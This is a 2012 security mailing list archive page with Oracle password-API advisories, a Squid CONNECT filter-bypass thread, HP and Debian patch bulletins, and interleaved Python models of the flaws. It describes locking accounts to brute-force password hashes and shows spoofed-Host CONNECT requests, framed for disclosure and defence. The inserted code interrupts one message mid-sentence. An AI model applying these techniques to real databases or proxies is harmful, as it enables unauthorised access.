at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+Qe2YACgkQRx91imnNIgGbKQCaAmGaN+X+t8TgB9KaE53DEApF
d5UAoJhleLxqf78/sgJZvtG7gsYu8e3a
=+2TC
-END PGP SIGNATURE-


OCIPasswordChange API leaks information of password hash (CVE-2012-0511)

2012-04-20 Thread Esteban Martinez Fayo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

OCIPasswordChange API leaks information of password hash.

Risk Level:
High

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.4 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides the OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, because it must also serve accounts
whose password has expired, so that the user can replace the expired
password with a new one.
It was observed that for locked accounts this API leaks information
about the correct user password hash by giving different responses,
depending on whether the decryption of the new password
(AUTH_NEW_PASSWORD field), performed by the server, succeeds or not.
This information can be used to perform an off-line brute force attack
to guess the correct password.  An internal proof-of-concept tool
demonstrated that it is possible to try millions of passwords per
second, making it possible to crack passwords of fewer than 9
characters in a few hours.
Note that to perform this attack the account must be locked.  An
attacker can lock an account by reaching the maximum failed login
attempts limit (10 by default).  The attacker will be able to log in as
the user once the account is unlocked.

Impact:
Remote unauthenticated attackers can perform off-line unlimited password
guesses on locked database accounts.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Implement a strong password policy.
Use some kind of external authentication (like network or directory
service based) instead of native database authentication.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0511

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3434

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012




-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QeeMACgkQRx91imnNIgEmCQCcCLZ1sAbpmovyaaa5xJ+Zi41u
KkYAn1jcGgpMrvGuDE/7dvSIi5bOzQcO
=P0et
-END PGP SIGNATURE-


Incomplete protection of Oracle Database locked accounts (CVE-2012-0510)

2012-04-20 Thread Shatter
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

Incomplete protection of Oracle Database locked accounts.

Risk Level:
Low

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.5 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides the OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, because it must also serve accounts
whose password has expired, so that the user can replace the expired
password with a new one.
It was observed that this API can be used to change the password of
users that are locked.  The purpose of locking an account is to
deactivate it once it has received too many failed login attempts or
when no login is expected.  If the password of a locked account can be
changed, the lock does not correctly protect it, because brute force can
be applied to the account to change its password, and eventually it will
be changed to a known password. The attacker will be able to log in
using the account only once it is unlocked.

Impact:
An unauthenticated attacker can perform on-line brute force of accounts
to change the password to a known value.  The attacker will be able to
log in using the account only once it is unlocked.
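The three AppSecInc advisories above (CVE-2012-0511 twice, CVE-2012-0510) describe one underlying design fault: a password-change path that runs the "decrypt the new password" step before the lockout accounting, answers differently depending on how that step went, and never consults the locked flag. The model below is an added illustration, not Oracle's code and not the O5LOGON wire format: seal()/unseal() stand in for the encryption of AUTH_NEW_PASSWORD, and the trailing check byte is my assumption about how the server notices a failed decryption (the advisory only states the observed roughly 1-in-200 rate). It puts the described order of checks next to a corrected one so the three effects can be measured.

```python
"""Model of the OCIPasswordChange accounting flaws behind CVE-2012-0511 and CVE-2012-0510.

Constructed illustration; this is not Oracle's code and does not reproduce the O5LOGON
wire format. seal()/unseal() stand in for the encryption of AUTH_NEW_PASSWORD, and the
trailing check byte is an assumption about how the server notices a failed decryption.
"""
import hashlib
import hmac

MAX_FAILED = 10                        # default FAILED_LOGIN_ATTEMPTS quoted in the advisory
CHALLENGE = b"constructed-challenge"   # a real server issues a fresh nonce per session


def derive_key(password: str) -> bytes:
    """Toy stand-in for the key the server derives from the stored password hash."""
    return hashlib.sha256(password.encode()).digest()


def _keystream(key: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """XOR plaintext plus a trailing 0x00 check byte with a key-derived stream."""
    data = plaintext + b"\x00"
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def unseal(key: bytes, sealed: bytes):
    """Plaintext, or None when the check byte is wrong ("decryption failed").

    Under the wrong key the check byte is effectively random, so roughly 1 in 256 wrong
    guesses still "decrypts": the same order of magnitude as the 1-in-200 rate reported.
    """
    data = bytes(a ^ b for a, b in zip(sealed, _keystream(key, len(sealed))))
    return data[:-1] if data[-1] == 0 else None


def make_request(guess: str, new_password: str) -> dict:
    """A client's change request: authenticator plus sealed new password, both built
    from the password the client believes is current (for an attacker, a guess)."""
    key = derive_key(guess)
    return {"auth": hmac.new(key, CHALLENGE, "sha256").digest(),
            "new": seal(key, new_password.encode())}


class Account:
    def __init__(self, password: str):
        self.key = derive_key(password)
        self.failed = 0
        self.locked = False


def _count_failure(acct: Account) -> None:
    acct.failed += 1
    if acct.failed >= MAX_FAILED:
        acct.locked = True


def vulnerable_change_password(acct: Account, req: dict) -> str:
    """Order of checks as the three advisories describe the pre-patch behaviour."""
    new = unseal(acct.key, req["new"])
    if new is None:
        return "ERR_DECRYPT"      # not counted, and distinguishable from every other answer
    expected = hmac.new(acct.key, CHALLENGE, "sha256").digest()
    if not hmac.compare_digest(req["auth"], expected):
        _count_failure(acct)      # only reached when the decryption happened to pass
        return "ERR_AUTH"
    acct.key = derive_key(new.decode())   # the locked flag is never consulted
    return "OK"


def fixed_change_password(acct: Account, req: dict) -> str:
    """Locked is terminal, every failure counts, and all failures look alike."""
    if acct.locked:
        return "ERR_AUTH"
    new = unseal(acct.key, req["new"])
    expected = hmac.new(acct.key, CHALLENGE, "sha256").digest()
    if new is None or not hmac.compare_digest(req["auth"], expected):
        _count_failure(acct)
        return "ERR_AUTH"
    acct.key = derive_key(new.decode())
    return "OK"


def brute_force(handler, acct: Account, guesses) -> dict:
    """One change request per guess; report what the account actually recorded."""
    for g in guesses:
        handler(acct, make_request(g, "attacker-chosen"))
    return {"attempts": len(guesses), "recorded": acct.failed, "locked": acct.locked}


def probe_locked(handler, password: str, guesses) -> set:
    """Distinct answers a locked account gives to a mix of wrong and right passwords."""
    acct = Account(password)
    acct.locked = True
    return {handler(acct, make_request(g, "attacker-chosen")) for g in guesses}
```

Against the vulnerable handler, thousands of wrong guesses leave only a handful of recorded failures and a locked account still answers "OK" to the right password and "ERR_DECRYPT" to most wrong ones; the fixed handler locks after exactly MAX_FAILED requests and gives a locked account one answer regardless of input.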

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0510

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3443

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QeAYACgkQRx91imnNIgHaiACgvwlCq4y6e/DAkhMElhbEIBUA
3MsAoIXcRsvC6TQP20idA6yA/tihMmyz
=zO5Y
-END PGP SIGNATURE-


RE: Squid URL Filtering Bypass

2012-04-20 Thread Jim Harrison
To be clear, the CONNECT request is a single request/response cycle  between 
the client and the proxy.  Any request body is nonsensical and should be 
ignored by the proxy (or the request can be rejected if the proxy wants to be 
pedantic).  There is nothing that explicitly disallows inclusion of the host 
header in a CONNECT request.  Granted, including the host header incurs some 
degree of ambiguity (the FQDN may resolve to the IP address, but the IP address 
is not guaranteed to resolve to the FQDN), but this is clearly a debatable 
choice on the developer's part as to whether it should be used to determine 
traffic policy applicability for this request.

The proxy should only ignore further data between the client and remote if the 
proxy successfully established a TCP connection between them on the specified 
destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the 
proxy should either queue or reject further communication from the client until 
the TCP connection has been successfully established and the proxy has 
responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error 
response to the client and close the client-to-proxy connection.

Likewise, while the proxy does establish the end-to-end TCP connection between 
the client and upstream server, it is not responsible for any part of the 
encryption that may be involved in that communication - unless it specifically 
offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL 
Forward Proxy (other vendors have similar features).

Also, whether the McAfee proxy allows translating normal HTTP methods to 
CONNECT, then tunneling them to the upstream proxy is irrelevant to the 
question of whether the local proxy actually uses the host header or the host 
portion of the CONNECT request to determine policy applicability.

Regardless - unless the proxy under test explicitly states that the host header 
information is used to determine policy application to a request, there is no 
vulnerability.

Jim

-Original Message-
From: Mario Vilas [mailto:mvi...@gmail.com] 
Sent: Thursday, April 19, 2012 10:03 AM
To: Richard Barrett
Cc: Gabriel Menezes Nunes; bugtraq
Subject: Re: Squid URL Filtering Bypass

What I understand from the advisory is the Squid proxy is basing its filtering 
on the Host header when present, even for the CONNECT command which doesn't 
allow this header at all as it makes no sense. I haven't confirmed the bug but 
what's being described is definitely a vulnerability.

There's also a small misconception in what you said. The proxy will see the 
entire CONNECT request, headers and all - after the request headers there'll be 
a pair of newlines, and only *then* the remaining data is tunneled 
transparently. So it's the second request's headers that the proxy won't see.

On Wed, Apr 18, 2012 at 7:46 PM, Richard Barrett  
wrote:
>
> A forward proxy server when presented with a CONNECT request is solely 
> responsible for attempting to facilitate an end-to-end encrypted path between 
> the requesting client and the far end server. The CONNECT method does no more 
> than create a temporary hole in your firewall.
>
> Only once that is done is a normal HTTP request, including headers such as 
> the Host: header, passed over the encrypted path by the client. Most 
> crucially, the proxy server cannot see the HTTP request or its headers due to 
> the end-to-end encryption. You can use the encrypted path to carry any 
> protocol or data you like and the proxy server is quite oblivious to it as it 
> is opaque to the proxy.
>
> The only access control that the proxy server can perform is based on the 
> CONNECT method request and the server identified in it by either IP number or 
> FQDN and port.
>
> You do not say what the acl is that you have asked Squid to apply but it 
> cannot involve any examination of the Host: header of a request if the 
> CONNECT method is used; only the far end server can see that.
>
> The same  conclusion also applies to your other post about a vulnerability 
> with "McAfee Web Gateway URL Filtering Bypass"
>
> On 16 Apr 2012, at 23:11, Gabriel Menezes Nunes wrote:
>
> > # Exploit Title: Squid URL Filtering Bypass # Date: 16/04/2012 # 
> > Author: Gabriel Menezes Nunes # Version: Squid Proxy # Tested on: 
> > Squid Proxy 3.1.19 # CVE: CVE-2012-2213
> >
> >
> > I found a vulnerability in Squid Proxy that allows access to filtered sites.
> > The software believes in the Host field of HTTP Header using CONNECT method.
> > Example
> >
> > CONNECT 66.220.147.44:443 HTTP/1.1
> > Host: www.facebook.com
> >
> >
> > It is blocked.
> >
> > CONNECT 66.220.147.44:443 HTTP/1.1 (without host field)
> >
> > It is blocked.
> >
> > But:
> >
> > CONNECT 66.220.147.44:443 HTTP/1.1
> > Host: www.uol.com.br (allowed url)
> >
> > The connection works.
> >
> > From here, I can send SSL traffic without a problem. This way, I can 
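The disagreement in the thread comes down to which field a proxy evaluates its ACL against when a CONNECT request carries a Host header. The script below is an added illustration, not Squid code, and does not reproduce Squid's ACL engine or confirm the reported behaviour of any release: it parses a CONNECT request and applies the Host-trusting policy the original post describes, the request-line policy a proxy can actually enforce, and a stricter variant that rejects a Host header that disagrees with the target. The first three requests are the ones from the original post, re-typed as constructed samples; the fourth request and the deny list are assumptions.

```python
"""CONNECT policy decisions: request-line authority versus the Host header.

Added illustration of the point argued in the thread above; it is not Squid code and does
not reproduce Squid's ACL engine or the unconfirmed behaviour of any particular release.
The first three requests are the ones from the original post, re-typed as constructed
samples; the fourth and the deny list are assumptions.
"""
from dataclasses import dataclass, field


@dataclass
class ConnectRequest:
    host: str                      # authority the proxy would actually dial
    port: int
    headers: dict = field(default_factory=dict)


def parse_connect(raw: bytes) -> ConnectRequest:
    """Parse 'CONNECT host:port HTTP/1.x' and its headers; any body is ignored."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    if method != "CONNECT" or not version.startswith("HTTP/1."):
        raise ValueError("not a CONNECT request")
    host, sep, port = target.rpartition(":")
    if not sep or not host or not port.isdigit():
        raise ValueError("CONNECT target must be host:port")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return ConnectRequest(host.strip("[]"), int(port), headers)


BLOCKED = {"www.facebook.com", "66.220.147.44"}   # assumed deny ACL: name and its address


def host_header_policy(req: ConnectRequest) -> bool:
    """The behaviour the advisory describes: trust Host: whenever it is present."""
    subject = req.headers.get("host", req.host).rsplit(":", 1)[0]
    return subject not in BLOCKED


def target_policy(req: ConnectRequest) -> bool:
    """What the proxy can enforce: the authority it will open a TCP connection to."""
    return req.host not in BLOCKED


def strict_policy(req: ConnectRequest) -> bool:
    """Target-based, and also refuse a Host: that names something other than the target."""
    host = req.headers.get("host")
    if host is not None and host.rsplit(":", 1)[0] != req.host:
        return False
    return target_policy(req)


SAMPLES = {
    "blocked_host": b"CONNECT 66.220.147.44:443 HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n",
    "no_host":      b"CONNECT 66.220.147.44:443 HTTP/1.1\r\n\r\n",
    "spoofed_host": b"CONNECT 66.220.147.44:443 HTTP/1.1\r\nHost: www.uol.com.br\r\n\r\n",
    "allowed":      b"CONNECT www.uol.com.br:443 HTTP/1.1\r\nHost: www.uol.com.br:443\r\n\r\n",
}


def evaluate(policy) -> dict:
    """Allow (True) or deny (False) decision of one policy for every sample request."""
    return {name: policy(parse_connect(raw)) for name, raw in SAMPLES.items()}
```

Only the Host-trusting policy lets the spoofed request through, which is the whole of the reported bypass; the strict variant costs nothing for well-behaved clients, which either omit Host on CONNECT or repeat the target in it.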

DC4420 - London DEFCON - April meet - Tuesday April 24th 2012

2012-04-20 Thread Major Malfunction
Yes, It's INFOSEC week again, so limber up your shwag carrying muscles 
and head down to get your shiny shiny!!! You know you can never have too 
many stress balls or thumb drives... And while you're there, come and 
see us!


As usual, we are making special arrangements for the influx of bods that 
we would not normally get to see, so please note we are NOT AT THE 
PHOENIX


I'll say it again. We're not there, we're here: The Troubadour

http://maps.google.co.uk/maps/place?cid=11073162209179321373&q=The+Troubadour+Cafe,+London&hl=en&ie=UTF8&ll=51.546549,-0.320492&spn=0.000107,0.000172&t=m&z=13&vpsrc=0

It's not far from Earls Court Tube (District/Piccadilly) and very close 
to the West Brompton train station where the overland choo choo goes 
from t'north round to Clapham, Euston and other places of London...


http://www.tfl.gov.uk/assets/downloads/London-Overground-Network-map.pdf

The UK Conference 44Con are holding an event there:  44Cafe
(from lunchtime) and they are gifting us the venue for the evening. 
How sweet. This kind of splendid venue doesn't come cheap... it will be 
rather different and you will like it. Regulars will need to be
early though, as space will be a bit more limited than usual.

We are in the club downstairs, but there's a full 50's styled cafe 
upstairs for chatting with a great menu and coffee and the odd  beer.
When they say they do 'all day breakfast' they _mean_ it. You can order 
it at 10.30pm...


As for talks, we will have (ahem!), myself (Aperture Labs, Defcon Goon, 
RFIDiot) talking about either new and shiny RFID or RF or both, 
depending on StuffThatNeedsToHappenBeforeItCanGoPublic(tm), and...


Steve Lord (Mandalorian, 44Con Co-organiser) talking about OtherStuff(tm).

Kickoff at 19:30, kickout some time after normal as they have a late 
licence... (website claims 02:00, so let's see how close we can get! :)


See you next week!
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...


[security bulletin] HPSBUX02761 SSRT100823 rev.1 - HP-UX Running Apache, Remote Denial of Service (DoS), Local Increase of Privilege

2012-04-20 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03278391
Version: 1

HPSBUX02761 SSRT100823 rev.1 - HP-UX Running Apache, Remote Denial of Service 
(DoS), Local Increase of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-04-18
Last Updated: 2012-04-18

Potential Security Impact: Remote Denial of Service (DoS), local increase of 
privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX Running 
Apache. These vulnerabilities could be exploited remotely to create a Denial of 
Service (DoS) or to gain a local increase of privilege.

References: CVE-2011-3607, CVE-2012-0021, CVE-2012-0031, CVE-2012-0053

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.22 or earlier
HP-UX B.11.11 running HP-UX Apache Web Server Suite v2.34 or earlier

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference      Base Vector                    Base Score
  CVE-2011-3607  (AV:L/AC:M/Au:N/C:P/I:P/A:P)   4.4
  CVE-2012-0021  (AV:N/AC:H/Au:N/C:N/I:N/A:P)   2.6
  CVE-2012-0031  (AV:L/AC:L/Au:N/C:P/I:P/A:P)   4.6
  CVE-2012-0053  (AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software updates to resolve these vulnerabilities.
The update for B.11.11 is available for download from 
https://h20392.www2.hp.com/portal/swdepot/try.do?productNumber=HPUXWSATW235
The update for B.11.23 and B.11.31 is available for download from 
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXWSATW323

Web Server Suite Version        HP-UX Release   Apache Depot Name

HP-UX Web Server Suite v.3.23   HP-UX B.11.23   HPUXWS22ATW-B323-64.depot
                                HP-UX B.11.23   HPUXWS22ATW-B323-32.depot
                                HP-UX B.11.31   HPUXWS22ATW-B323-64.depot
                                HP-UX B.11.31   HPUXWS22ATW-B323-32.depot

HP-UX Web Server Suite v.2.35   HP-UX B.11.11   HP-UX_11.11_HPUXWSATW-B235-.depot

MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.23 or subsequent
Install HP-UX Web Server Suite v2.35 or subsequent

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23
HP-UX B.11.31
==
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
action: install revision B.2.2.15.12 or subsequent

HP-UX B.11.11
==
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
action: install revision B.2.0.64.03 or subsequent

END AFFECTED VERSIONS
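The AFFECTED VERSIONS block is written for HP-UX Software Assistant, but the same comparison is easy to run by hand when SWA is not available. The script below is an added example, not HP code and not SWA: it carries the fileset table from the bulletin, compares installed revisions numerically field by field (a plain string comparison orders B.2.0.9.x after B.2.0.64.03 and would miss an outdated system), and reports which filesets are behind. The sample inventory is constructed in the shape of "fileset  revision  description" lines, and its revision values are invented.

```python
"""Check installed HP-UX Apache filesets against the revisions this bulletin requires.

Added example, not HP code or HP-UX Software Assistant. The fileset table is the
AFFECTED VERSIONS block above; the sample inventory is constructed in the shape of
"fileset  revision  description" lines, and the revision values in it are invented.
"""

B1123_B1131 = {f"hpuxws22APCH32.{n}" for n in (
    "APACHE", "APACHE2", "AUTH_LDAP", "AUTH_LDAP2", "MOD_JK", "MOD_JK2",
    "MOD_PERL", "MOD_PERL2", "PHP", "PHP2", "WEBPROXY", "WEBPROXY2")}
B1111 = {f"hpuxwsAPACHE.{n}" for n in (
    "APACHE", "APACHE2", "AUTH_LDAP", "AUTH_LDAP2", "MOD_JK", "MOD_JK2",
    "MOD_PERL", "MOD_PERL2", "PHP", "PHP2", "WEBPROXY")}

# "action: install revision X or subsequent" from the bulletin, per fileset.
REQUIRED = {**{f: "B.2.2.15.12" for f in B1123_B1131},
            **{f: "B.2.0.64.03" for f in B1111}}


def parse_revision(rev: str) -> tuple:
    """'B.2.2.15.12' -> ('B', 2, 2, 15, 12): numeric fields compare as numbers."""
    head, *rest = rev.split(".")
    return (head, *(int(x) for x in rest))


def needs_update(fileset: str, installed: str):
    """True/False for filesets the bulletin covers, None for anything else."""
    required = REQUIRED.get(fileset)
    if required is None:
        return None
    return parse_revision(installed) < parse_revision(required)


def audit(inventory: str) -> list:
    """(fileset, installed, required) for every covered fileset that is behind."""
    behind = []
    for line in inventory.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fileset, installed, *_description = line.split()
        if needs_update(fileset, installed):
            behind.append((fileset, installed, REQUIRED[fileset]))
    return behind


# Constructed inventory; fileset revisions below are invented for the example.
SAMPLE_INVENTORY = """\
# fileset                revision      description
hpuxws22APCH32.APACHE    B.2.2.15.10   HP-UX Apache-based Web Server
hpuxws22APCH32.PHP       B.2.2.15.12   PHP
hpuxwsAPACHE.APACHE      B.2.0.9.1     HP-UX Apache 2.0
hpuxwsTOMCAT.TOMCAT      B.5.5.33.01   Tomcat Servlet Engine
"""
```

Feed it the fileset list of each host (for example the output of an `swlist -l fileset` run, reduced to the three columns assumed here) and treat any non-empty result as "install the depot for that release".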

HISTORY
Version:1 (rev.1) - 18 April 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware an

[SECURITY] [DSA 2454-1] openssl security update

2012-04-20 Thread Raphael Geissert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2454-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
April 19, 2012 http://www.debian.org/security/faq
- -

Package: openssl
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-0884 CVE-2012-1165 CVE-2012-2110

Multiple vulnerabilities have been found in OpenSSL. The Common
Vulnerabilities and Exposures project identifies the following issues:

CVE-2012-0884

Ivan Nestlerode discovered a weakness in the CMS and PKCS #7
implementations that could allow an attacker to decrypt data
via a Million Message Attack (MMA).

CVE-2012-1165

It was discovered that a NULL pointer could be dereferenced
when parsing certain S/MIME messages, leading to denial of
service.

CVE-2012-2110

Tavis Ormandy, Google Security Team, discovered a vulnerability
in the way DER-encoded ASN.1 data is parsed that can result in
a heap overflow.


Additionally, the fix for CVE-2011-4619 has been updated to address an
issue with SGC handshakes.

For the stable distribution (squeeze), these problems have been fixed in
version 0.9.8o-4squeeze11.

For the testing distribution (wheezy), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 1.0.1a-1.

We recommend that you upgrade your openssl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk+QgdEACgkQYy49rUbZzlrPxACgmA4me/ZAVZS/TDIifkHgiU9q
x/QAn0pU8BwEFv8ugmm746OX7jDQMnYP
=JCSE
-END PGP SIGNATURE-